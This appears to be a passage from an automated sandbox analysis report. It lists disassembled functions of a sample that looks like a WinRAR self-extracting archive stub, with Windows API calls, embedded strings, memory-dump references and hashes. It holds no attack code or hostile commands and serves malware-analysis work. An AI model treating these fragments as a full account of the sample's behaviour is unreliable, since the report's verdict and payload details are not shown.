TerminateProcess.KERNEL32(00000000,?,008E7513,00000000,008FBAD8,0000000C,008E766A,00000000,00000002,00000000), ref: 008E7565
ExitProcess.KERNEL32 ref: 008E7577

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9e1da1df30695b46962ec857555478469a11c87279821e4e0513d4d06fd49545
Instruction ID: b7f198501eb7f92685a0ae8e5294541b8c6307dc4db1cf5916a2fce4f2497dd9
Opcode Fuzzy Hash: 9e1da1df30695b46962ec857555478469a11c87279821e4e0513d4d06fd49545
Instruction Fuzzy Hash: 58E0EC31004988AFCF11AF69DD09E593F69FF86781F108424F905CA232CB35EE42CB51

Function 008C857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C8580
_memcmp.LIBVCRUNTIME ref: 008C8A08

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 5d0733d61fa22e5bc79c635433ed420473634bd543d437aa92162792442f66de
Instruction ID: eb60ef74b006f0a2808f03d0edc2fd7d30ea27d38069d5adee4333a47988b276
Opcode Fuzzy Hash: 5d0733d61fa22e5bc79c635433ed420473634bd543d437aa92162792442f66de
Instruction Fuzzy Hash: 1882B270944245EEDF25DB648885FFABBB9FF15300F0841BEE999DB142DB309A48CB61

Function 008DAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008DAEE5

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

Strings

C:\Users\user\Desktop, xrefs: 008DB2DF
__tmp_rar_sfx_access_check_%u, xrefs: 008DB1CB
LICENSEDLG, xrefs: 008DB771
@, xrefs: 008DB2A7
"%s"%s, xrefs: 008DB423
STARTDLG, xrefs: 008DAF04
winrarsfxmappingfile.tmp, xrefs: 008DB2BC
<, xrefs: 008DB29A
-el -s2 "-d%s" "-sp%s", xrefs: 008DB281

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: fb568ffc2ff1b8bc9096ae52f446dd6dd5375343326d11351ff4a0fe3355d56e
Instruction ID: bbb5c327e256720e321d71421efd5e8c129575e8bf3bd41dbb04f8915a6e1672
Opcode Fuzzy Hash: fb568ffc2ff1b8bc9096ae52f446dd6dd5375343326d11351ff4a0fe3355d56e
Instruction Fuzzy Hash: 7242B470958244BEEB21ABB49C8AFBE777CFB01704F004256F645E62E2CB744945EB62

Function 008D00CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 008D00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008D00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008D0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008D03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008D03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008D0402
ReadFile.KERNEL32(00000000,?,00007FFE,008F3BA4,00000000), ref: 008D0421
CloseHandle.KERNEL32(00000000), ref: 008D0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008D048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008D04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 008D0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 008D054A

Part of subcall function 008D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008D00A0
Part of subcall function 008D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008CEB86,Crypt32.dll,00000000,008CEC0A,?,?,008CEBEC,?,?,?), ref: 008D00C2

_swprintf.LIBCMT ref: 008D05BE
_swprintf.LIBCMT ref: 008D060A

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

AllocConsole.KERNEL32 ref: 008D0612
GetCurrentProcessId.KERNEL32 ref: 008D061C
AttachConsole.KERNEL32(00000000), ref: 008D0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008D0649
WriteConsoleW.KERNEL32(00000000), ref: 008D0650
Sleep.KERNEL32(00002710), ref: 008D065B
FreeConsole.KERNEL32 ref: 008D0661
ExitProcess.KERNEL32 ref: 008D0669

Strings

Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 008D05F8
dwmapi.dll, xrefs: 008D0194, 008D0581
SetDllDirectoryW, xrefs: 008D00F0
SetDefaultDllDirectories, xrefs: 008D0121
DXGIDebug.dll, xrefs: 008D0169, 008D04D3
uxtheme.dll, xrefs: 008D058B
kernel32, xrefs: 008D00DD

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: fa72f00c9b8ed003ba75754bbf43e74983411fc9c5b82782e3e5707396e79ae1
Instruction ID: 73c8a9af6ba56268d2237cf0c6982dbee93c6c4e06207fbaf4ad3b9ed2a3086b
Opcode Fuzzy Hash: fa72f00c9b8ed003ba75754bbf43e74983411fc9c5b82782e3e5707396e79ae1
Instruction Fuzzy Hash: 57D130B1508788ABD7209FB4D849FABBBE8FB85704F50091EF785D6250DB70864C8F66

Function 008DBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 008DBDFA

Part of subcall function 008DAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008DAAFE

SetWindowTextW.USER32(?,?), ref: 008DC127
_wcsrchr.LIBVCRUNTIME ref: 008DC2B1
GetDlgItem.USER32(?,00000066), ref: 008DC2EC
SetWindowTextW.USER32(00000000,?), ref: 008DC2FC
SendMessageW.USER32(00000000,00000143,00000000,0090A472), ref: 008DC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008DC335

Strings

ProgramFilesDir, xrefs: 008DC1FB
Software\Microsoft\Windows\CurrentVersion, xrefs: 008DC1D0
<br>, xrefs: 008DC08A
%s.%d.tmp, xrefs: 008DBFF6

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: b7a9afec7d4510cf0a0fc5d88f065bbc1921cd552c6c67021a449d79db13565b
Instruction ID: 74c46f30e0c16b3f30923797baf0466f1a39d2ab4edeaa2368d94ac463e988f5
Opcode Fuzzy Hash: b7a9afec7d4510cf0a0fc5d88f065bbc1921cd552c6c67021a449d79db13565b
Instruction Fuzzy Hash: 3BE15C72D04629AADB25EBA4DC49EEB777CFF08310F1042A7E605E3251EA749E84CB51

Function 008CD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 008CD346
_wcschr.LIBVCRUNTIME ref: 008CD367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,008CD328,?), ref: 008CD382
__fprintf_l.LIBCMT ref: 008CD873

Part of subcall function 008D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008CB652,00000000,?,?,?,00010466), ref: 008D1396

Strings

@%s:, xrefs: 008CD85D, 008CD869
$%s:, xrefs: 008CD856
,, xrefs: 008CD8AE
R, xrefs: 008CD4E5
a, xrefs: 008CD4EF
RTL, xrefs: 008CD838
*messages***, xrefs: 008CD49A
, xrefs: 008CD67A
*messages***, xrefs: 008CD4D3

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 35e03c0b002aad7790fc39c12846690e6083ec85cfae29928adf15d24b6baad1
Instruction ID: e0b193353a940898e73eea0c419c3a4053455f2cccddd16df56b5ddf0531de48
Opcode Fuzzy Hash: 35e03c0b002aad7790fc39c12846690e6083ec85cfae29928adf15d24b6baad1
Instruction Fuzzy Hash: D312A071900319AADB24EBA8D885FEEB7B5FF04304F10457EE606E7281EB70DA45CB65

Function 008DCB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008DAC85
Part of subcall function 008DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008DAC96
Part of subcall function 008DAC74: IsDialogMessageW.USER32(00010466,?), ref: 008DACAA
Part of subcall function 008DAC74: TranslateMessage.USER32(?), ref: 008DACB8
Part of subcall function 008DAC74: DispatchMessageW.USER32(?), ref: 008DACC2

GetDlgItem.USER32(00000068,0091ECB0), ref: 008DCB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,008DA632,00000001,?,?,008DAECB,008F4F88,0091ECB0), ref: 008DCB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008DCBA1
SendMessageW.USER32(00000000,000000C2,00000000,008F35B4), ref: 008DCBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008DCBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008DCBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008DCC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008DCC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008DCC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008DCC67
SendMessageW.USER32(00000000,000000C2,00000000,008F431C), ref: 008DCC76

Strings

\, xrefs: 008DCBCF

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 050f2ecb14a45db6cfc12709136c32203525bdf786bbea6f935fa156d4e628dc
Instruction ID: a0800404c299a0686788a06adaeaa38b14f2e2744e9eeff5aabc3372cb05588b
Opcode Fuzzy Hash: 050f2ecb14a45db6cfc12709136c32203525bdf786bbea6f935fa156d4e628dc
Instruction Fuzzy Hash: 4A31E171299342BFD311DF20DC4AFAB7FACEB82704F000519F691D62A1DB644905EB76

Function 008DCE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 008DCF54
ShowWindow.USER32(?,00000000), ref: 008DCF93
GetExitCodeProcess.KERNEL32(?,?), ref: 008DCFCF
CloseHandle.KERNEL32(?), ref: 008DCFF5
ShowWindow.USER32(?,00000001), ref: 008DD084

Part of subcall function 008D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008CBB05,00000000,.exe,?,?,00000800,?,?,008D85DF,?), ref: 008D17C2

Strings

.inf, xrefs: 008DCF10
.exe, xrefs: 008DCFFF
, xrefs: 008DCEA2

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: e79e05df818d0e40bea269e73953b78766ba1afc6a869a01fc13d44f654f570f
Instruction ID: 584f302503320eac4a86226d7f50d2a64b474c60f528d2edf54609ed7694cd61
Opcode Fuzzy Hash: e79e05df818d0e40bea269e73953b78766ba1afc6a869a01fc13d44f654f570f
Instruction Fuzzy Hash: 4661D2B0508781AAD7319F24D804AABBBE9FF81304F044A1BF5C5D7351DBB18D85DB92

Function 008EA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008E4E35,008E4E35,?,?,?,008EA2A9,00000001,00000001,3FE85006), ref: 008EA0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008EA2A9,00000001,00000001,3FE85006,?,?,?), ref: 008EA138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008EA232
__freea.LIBCMT ref: 008EA23F

Part of subcall function 008E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008EC13D,00000000,?,008E67E2,?,00000008,?,008E89AD,?,?,?), ref: 008E854A

__freea.LIBCMT ref: 008EA248
__freea.LIBCMT ref: 008EA26D

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: fc6cc8f76a5ad2a5a835b6d9ff2b5c27d6f1ac0143dd663c0e786ee8bb207e1c
Instruction ID: e4985c7b3d7dcd786ba87bce253feda4d7af7eccd614186f386d3373193d4996
Opcode Fuzzy Hash: fc6cc8f76a5ad2a5a835b6d9ff2b5c27d6f1ac0143dd663c0e786ee8bb207e1c
Instruction Fuzzy Hash: E751E272610256AFDB298F76CC41EBB77A9FB42F50F154228FD05E6140EB35EC40C6A2

Function 008DA2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 008DA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 008DA315

Part of subcall function 008D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008CBB05,00000000,.exe,?,?,00000800,?,?,008D85DF,?), ref: 008D17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008DA305

Strings

EDIT, xrefs: 008DA2E9, 008DA2F4, 008DA301
@Ut, xrefs: 008DA315

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: acdf7c037171e131ba2790c221b33b393816f5ea6aeb142a1f5175e78ab98232
Instruction ID: 23b96a6394d3ba421eb7f4d59c201e72a85dd8da064f6ecc89454641c258304d
Opcode Fuzzy Hash: acdf7c037171e131ba2790c221b33b393816f5ea6aeb142a1f5175e78ab98232
Instruction Fuzzy Hash: 09F0E232A4522877E7305B64AC09FAB776CEF46B00F540153BE04E6280D7609942C6FA

Function 008DA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008D00A0
Part of subcall function 008D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008CEB86,Crypt32.dll,00000000,008CEC0A,?,?,008CEBEC,?,?,?), ref: 008D00C2

OleInitialize.OLE32(00000000), ref: 008DA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008DA385
SHGetMalloc.SHELL32(00908430), ref: 008DA38F

Strings

riched20.dll, xrefs: 008DA33D
3Ro, xrefs: 008DA366

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: b1f01ea45b4dc7c1944e33d2b6159a30ea925b38322652cbef71843e831f490d
Instruction ID: 1ea915f45be8a411cb71438c0272bb081f9aa007135ffcb56048745131a57a3e
Opcode Fuzzy Hash: b1f01ea45b4dc7c1944e33d2b6159a30ea925b38322652cbef71843e831f490d
Instruction Fuzzy Hash: 0DF049B1D0420DABDB20AFA9D8499EFFBFCEF94311F00415BE814E2200CBB806059FA1

Function 008C99B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008C78AD,?,00000005,?,00000011), ref: 008C9A4C
GetLastError.KERNEL32(?,?,008C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008C9A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008C78AD,?,00000005,?), ref: 008C9A8E
GetLastError.KERNEL32(?,?,008C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008C9A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008C78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008C9ADB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: d305626a23e823234aa05c32fdf1fa09b82580088ab640dda2778d9c5770b186
Instruction ID: 311ae3909aa4e8165ae9beb8675bf10f2212c76963d4da682d884ced4f90f25f
Opcode Fuzzy Hash: d305626a23e823234aa05c32fdf1fa09b82580088ab640dda2778d9c5770b186
Instruction Fuzzy Hash: 3D411271544B556BE3209A24CC09FAABBE4FB01324F10071EF5E4D61D1E775E988CB96

Function 008DAC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008DAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008DAC96
IsDialogMessageW.USER32(00010466,?), ref: 008DACAA
TranslateMessage.USER32(?), ref: 008DACB8
DispatchMessageW.USER32(?), ref: 008DACC2

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 48753cc3bc0bd39df5c1a33882bf563f6a2b25906aff8aeb1612bdd42501acce
Instruction ID: a1ca5bdfa193473c2ec4a3691f6c2c6b4a3b5fdcad3caf294013173d7ed1ca67
